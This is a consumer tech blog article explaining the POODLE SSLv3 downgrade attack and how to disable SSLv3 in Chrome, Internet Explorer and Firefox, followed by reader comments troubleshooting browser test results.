Pinterest Stumbleupon Whatsapp
Ads by Google

When do people not like a puppy? When they know it’s not a puppy, but a browser exploit aimed at stealing their vital information. The POODLE (Padding Oracle On Downgraded Legacy Encryption) we’re talking about is a serious security attack.

As a security exploit, it can affect all web browsers, and therefore any one of us. Let’s find out what POODLE is, what it does, and what you can do to prevent it from biting you.

Background Info

To understand POODLE, you need to know a bit about SSL and TLS What Is HTTPS & How To Enable Secure Connections Per Default What Is HTTPS & How To Enable Secure Connections Per Default Security concerns are spreading far and wide and have reached the forefront of most everybody's mind. Terms like antivirus or firewall are no longer strange vocabulary and are not only understood, but also used by... Read More . They are two cryptographic protocols that were developed to help protect your important web communications. When you go to a website and you see HTTPS:// before the web address, you’re using SSL/TLS. SSL (Secure Socket Layer) and TLS (Transport Security Layer) are two very different protocols, but most people just lump them together and call them SSL. SSL was actually replaced by the TLS protocol around ten years ago as the de facto standard for cryptography, yet SSL is still in wide use. That’s what makes POODLE dangerous.

When you visit a website, the computer that serves you the page (web server) is capable of several levels of cryptography security, anywhere from TLSv1.2, the most recent and secure protocol, to SSLv3, the older and less secure protocol. This allows your browser and the web server to be able to connect with the same protocol so they can talk securely. This is the fundamental way that web browsers and servers try to prevent man-in-the-middle attacks What Is A Man-In-The-Middle Attack? Security Jargon Explained What Is A Man-In-The-Middle Attack? Security Jargon Explained Read More , like POODLE.

What Does POODLE Do?

POODLE tries to force the connection between your web browser and the server to downgrade  to SSLv3. If it does that, the attacker can get the plain text information from the communication. That means that they can access cookies which are often used to store information, some of which could be personal and sensitive in nature What's A Cookie & What Does It Have To Do With My Privacy? [MakeUseOf Explains] What's A Cookie & What Does It Have To Do With My Privacy? [MakeUseOf Explains] Most people know that there are cookies scattered all over the Internet, ready and willing to be eaten up by whoever can find them first. Wait, what? That can’t be right. Yes, there are cookies... Read More . What the attacker does with that information is anybody’s guess, but it is never anything good.

On the upside, the POODLE attack is not the easiest way for an attacker to get your info. It may take hundreds, even thousands, of tries to get the POODLE attack to work on someone. So it is something to be concerned about, however it isn’t necessarily as bad as the recent Heartbleed issue Heartbleed – What Can You Do To Stay Safe? Heartbleed – What Can You Do To Stay Safe? Read More .

Ads by Google

How Can I Protect Myself from POODLE?

Fortunately, it’s a fairly easy thing to do. First things first, let’s see if you are POODLE vulnerable. Simply go to the POODLETest.com website. If you see a poodle, you have some cleaning up to do. If you see the Springfield Terrier, your browser is good to go. For those that are more tech savvy, check out Qualys SSL Labs’ SSL Client Test. It provides more in-depth details.

poodle-not-poodle

The underlying principle is to disable SSLv3 support in your web browser. If it’s disabled, POODLE can NOT downgrade your browser to it. Let’s look at how to do this in Chrome, Internet Explorer, and Firefox.

Be aware, many web sites still want to use SSLv3. If you disable it, those sites might not work as well for you as they once did. It wouldn’t hurt to send that company a nice e-mail with a link to this article so they are aware of the issue. Hopefully, they will upgrade to TLS and all will be good again.

Chrome

Find the shortcut that you use to launch Chrome. Right-click on it and then click on Properties.

chrome-poodle-step-1

When the Properties window opens, find the field named Target. There should be a long path to where the Chrome file is located. It should look like: “C:\Program Files (x86)\Google\Chrome\Application\chrome.exe” or “C:\Program Files\Google\Chrome\Application\chrome.exe”.

chrome-poodle-step-2

Click just after the last quotation mark and hit your space bar to create a space. Now type in the following:

 ––ssl-version-min=tls1

You could copy and paste that from here, too. What that tells Chrome to do is to use TLSv1 as the lowest version of security for your Chrome browser. Click on the Apply button at the bottom of the window, and the next time you open Chrome, it will be POODLE proofed.

Internet Explorer

Open your Internet Explorer browser and click on the Settings icon. It’s the one that looks like a gear. Now click on Internet options. A new window will open.

internet-explorer-ie-poodle-step-1

 

On the far right side, you will see a tab labelled Advanced – click on it. In the Settings area, scroll down until you see the options Use SSL 2.0 and Use SSL 3.0.

internet-explorer-ie-poodle-step-2

If there is a checkmark in those two boxes, uncheck them by clicking on them. Make sure that the boxes labelled Use TLS 1.o, Use TLS 1.1 and Use TLS 1.2 are checked. (If you don’t have all three of these TLS boxes, you should update your Internet Explorer.) Then click on the Apply button, and the OK button. Your Internet Explorer is now POODLE proofed.

Firefox

If you’re a fan of Firefox, here’s how to help the fox outsmart the POODLE. Simply go to Firefox’s SSL Version Control 0.2 Add-On page, then download and install the SSL Version Control 0.2 add-on. It’s that easy.

firefox-poodle-ssl-version-control-add-on

Firefox has also announced that it’s next version, Firefox 34, will disable support for SSLv3. However, that version won’t be released until sometime in November, according to their website.

POODLE Will Be Pooched

Once the majority of people POODLE-proof their browsers and the majority of web servers stop using SSLv3, POODLE will no longer be a problem. There is also a tool known as TLS_FALLBACK_SCSV that has been developed that web servers and browser programmers can implement to help. Unfortunately, that tool requires both the web server and the browser to have it. That will take awhile for everyone to implement. Only then SSLv3 will go by the wayside, as it should have a decade ago. Spread the word and make the Web a safer place to be.

Image Credits: Angry Poodle, HTTPS Vector Image via Shutterstock.

  1. bryan
    May 25, 2015 at 11:33 am

    The benefits of having a trained dog are endless. A few months ago I started to train mine with some videos I found online. They teach you step by step! Aggression, anxiety, biting, barking and disasters in the house have disappeared. My dog behaves excellent. And I have taught many tricks! Here is the address: theonlinedogtrainers.com

  2. Gordon Edwards
    November 28, 2014 at 12:35 pm

    G'day Guy - I think you will like K-Meleon.

    On IE11... I use and really like Avast! anti-virus. However, of late they have started injecting their own certificates and re-signing root certificates as part of their Web Security, possibly part of their Browser Protection. One result of this was to make IE look like it was vulnerable to Poodle, which it is not. I *_think_* it was because the Avast bits made SSL look like TLS... I cannot be sure.

    I do know that the Avast Certificate made one SSL site look like a TLS site to IE, and resulted in a lot of trouble for other people in the chain which I now have to untangle...

    IE (OK, Microsoft!) is certainly not innocent. It has problems. But in this case, it is not guilty. It does support TLS if you tick the boxes, and it won't support SSL if you untick the boxes. IE11 can definitely be made Poodle-proof.

    Give K-Meleon a try. It's my primary browser, then Opera 12.17 (Presto engine!), and only then IE. We won't talk about Chrome/etc...

    Gordon.

  3. Guy
    November 27, 2014 at 12:19 pm

    Curious indeed. I'm not familiar with K-Meleon, I'm going to have to look that up.

    I'm not a big fan of IE in general, so if I couldn't be certain it could be protected I'd just stop using it. That's not an option for some people, I understand. For example, Outlook Web Access and SharePoint 3.0 work better on IE in general.

  4. Gordon Edwards
    November 27, 2014 at 10:03 am

    Just been over to Qualys. Interesting. My IE11 is listed as "Not Vulnerable", but...

    IE11 seems to have only 22 TLS ciphers available, including TLS_EMPTY_RENEGOTIATION_INFO_SCSV (0xff), while K-Meleon has 31 TLS ciphers, NOT including the Empty cipher.

    Curious.

    Gordon.

  5. Gordon Edwards
    November 27, 2014 at 9:40 am

    Hi! Ummmm.... Disabling SSSl in my IE11 doesn't work. It is still reported as vulnerable in every test I have been to, while my K-Meleon74.24 and my Opera12.17 are both safe. I am heading over to Qualys now...

    I unchecked the SSL boxes in Admin and in every User account on this box, and the box is routinely shut down every night. I use W7HPx64 SP1, and IE11 was installed via a Microsoft indirect update, over IE9>IE10>IE11...

    I am forced to the conclusion that IE is not Poodle-proof.

    Gordon.

  6. Guy
    October 29, 2014 at 7:26 pm

    D. Charles, anytime! We absolutely love it when our readers provide good, alternate ways to do things. That's how we all learn.

  7. D. Charles Pyle
    October 29, 2014 at 12:43 pm

    Good point. I just try to avoid plugins as much as possible because I have found that a number of them sometimes end up being broken by newer versions of Firefox. Well, at least people now have a couple ways to do this in Firefox. Thanks for allowing my post and for the article.

  8. D. Charles Pyle
    October 28, 2014 at 2:42 pm

    I think we do not really need to plugin. I think that you could also go to about:config in Firefox and change the security.tls.version.min from 0 to 1, couldn't we?

    • Guy
      October 28, 2014 at 8:30 pm

      D. Charles, good call, makes sense.
      I recommended the plugin to try to keep it simple for folks.
      You might be amazed at how many people would be terrified to even install a plugin.

  9. Aaron White
    October 28, 2014 at 1:41 pm

    Would there be an easy way of changing the settings for a large number of users in an office?
    Our company is in the Medical field, and since most medical websites seem to hang onto the old ways as long as possible, many websites still require Internet Explorer 8 or 9 to work effectively.
    Is there a simple way to block this on a large scale to make sure our information isn't compromised?

    • Guy
      October 28, 2014 at 8:33 pm

      Yes, there is, but it requires Administrator access at the server level.

      Usually the shortcut for IE is part of the All Users or Default profile, so they could make the change there, and it should propagate down the line.

      Or maybe something in Group Policy. Hadn't really looked into it, but those are the two places I'd start.

    • Aaron
      October 29, 2014 at 5:54 pm

      I've got the access side covered, i just wan't sure if there was a way to prevent having to go desk to desk. I just got done with a headache password change for everyone, so the less running the better.

      Thanks!

    • Guy
      October 30, 2014 at 12:25 pm

      Hey Aaron, I totally understand. Been there, done that.

      Do keep in mind that by proofing your browser against the POODLE attack, some websites might not work.

      The web servers that those sites are on may only be using SSLv3. If that's the case, then for your browsers to communicate with them, the browser has to use SSLv3 as well.

      It's a real catch-22 situation. All you can do at that point is to call the owner of the web site and have them talk to their web host about upgrading the server to use at least TLSv1.

    • Aaron
      October 30, 2014 at 12:28 pm

      Thanks!
      I'll give that a look and see what we've got. The downside to Healthcare websites seems to be that many of them like to use the oldest versions of IE possible, so a lot of our copies of IE have already been rolled back to 8 or 9.

  10. pym
    October 27, 2014 at 5:04 pm

    i have chrome . poodlet showed a terrier .qualys said agent is vunerable. i added onto the target field..then went back and checked poodlelet and then qualys and there is no change in the qualys. hel0 i am computer illiterate senior

    • Guy
      October 27, 2014 at 8:42 pm

      I suspect that there might be a typo or something missing from your target field.
      Best to double-check that first.

      Then once you are sure it is correct, completely close out Chrome. Possibly even restart your computer. (Chrome often leaves stuff running in the background that you can't see.)

      Then try the POODLE tests again.

  11. dragonmouth
    October 26, 2014 at 2:28 pm

    " Simply go to Firefox’s SSL Version Control 0.2 Add-On page, then download and install the SSL Version Control 0.2 add-on."
    The add-on is not necessary for the Linux version of Firefox. Shortly after POODLE was announced, Linux distro developers issued a Security Update. No matter what distro you are running, just apply the latest updates and you should be safe from POODLR bite.

    • Guy
      October 26, 2014 at 8:39 pm

      That's good to know! Thank you.

  12. Allan
    October 25, 2014 at 6:54 pm

    I do not know why my comment did not appear, but here goes again. I have followed the instruction, but poodletest.com says I am vulnerable in Firefox and Chrome, whereas Qualys says both are not vulnerable. Confused.

    • Guy
      October 26, 2014 at 8:43 pm

      You may need to completely shut down both browsers before running the tests again, like dragonmouth suggests.

    • Allan
      October 27, 2014 at 11:21 am

      Did all that, several times, deleted cache, did it again, still the same result - poodletest.com says vulnerable, Qualys says not.

    • Guy
      October 27, 2014 at 1:04 pm

      Odd. I'd be more inclined to trust the Qualys analysis then.

  13. Allan
    October 25, 2014 at 6:32 pm

    I do not understand. First I checked vulnerability at poodletest.com, it says I am vulnerable, so as I use Firefox 33.0.1 i clicked the link for the SSL Version Control. Problem solved. No, still vulerable. Checked through Qualys SSL Labs, and I'm not vulnerable according to them but still vulnerable according to poodletest.com after adding the Firefox add-on.

    Did what was listed for chrome and am still vulnerable in both tests.

    What's next?

    • dragonmouth
      October 26, 2014 at 2:22 pm

      Restart your browser then do the tests.

  14. Guy
    October 25, 2014 at 6:25 pm

    I'd have to see the test results from them to say for certain.

    Nonetheless, if you do the browser changes in the article, you should test 'not vulnerable' on both sites.

  15. Pat
    October 25, 2014 at 4:31 pm

    The one test site said I was not vulnerable and the other said I was. Whats up with that?

    • Allan
      October 25, 2014 at 7:48 pm

      I get the same result, poodletest says vulnerable, Qualys says not.

Leave a Reply

Your email address will not be published. Required fields are marked *